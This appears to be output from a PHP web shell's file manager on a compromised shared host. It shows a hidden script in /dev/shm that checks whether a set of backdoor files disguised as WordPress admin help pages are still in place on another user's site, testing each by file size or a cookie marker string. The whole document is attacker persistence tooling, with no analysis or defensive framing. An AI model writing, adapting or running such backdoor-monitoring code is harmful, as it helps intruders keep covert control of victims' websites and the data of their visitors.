HEX
Server: LiteSpeed
System: Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: swifizcd (1555)
PHP: 8.2.30
Disabled: NONE
Upload Files
File: //dev/shm/.resource
<?php   $r = '/home/scaldjls/public_html'; $x = ["/wp-admin/admin.help.2.php"=>"bd@@47138@@1730",
"/album_rate.php"=>"bd@@47178@@924",
"/wp-admin/admin-help.php"=>"bd@@46938@@$_COOKIE[3",
"/wp-admin/admin-help.2.php"=>"bd@@45708@@969",
"/wp-includes/admin.help.php"=>"bd@@47075@@1024",
"/wp-includes/admin-help.php"=>"bd@@46820@@72"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');